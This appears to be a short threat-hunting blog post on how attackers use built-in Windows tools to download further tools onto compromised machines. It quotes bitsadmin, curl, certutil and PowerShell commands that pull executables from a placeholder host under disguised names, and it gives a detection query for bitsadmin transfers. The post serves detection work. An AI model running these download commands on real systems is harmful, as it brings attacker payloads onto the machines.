333. Adversaries Use Multiple LOLBINs for Ingress Tool Transfer

Hello everyone!

In almost every case adversaries need to download additional tools to the compromised system. Very often they use LOLBINs to solve this task. Let's look at some of them.

For example, according to this report, the adversary leveraged multiple LOLBINs:

bitsadmin /transfer www /download http://<HOST>/winupdate.exe $public\libraries\winvt.exe

curl -o $public\libraries\service.exe http://<HOST>/service.exe

certutil -urlcache -f https://<HOST>/AkelPad.rar $public\libraries\AkelPad.rar

powershell.exe -Command powershell -Command "Invoke-WebRequest -Uri 'https://<HOST>/winupdate.exe' -OutFile '$public\pictures\sbschost.exe'

Such activities are great targets for hunting and detection. So, make sure you are covering it.

For example, BITSAdmin:

event_type: "processcreatewin"

AND

proc_file_path: "bitsadmin.exe"

AND

cmdline: "transfer"

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge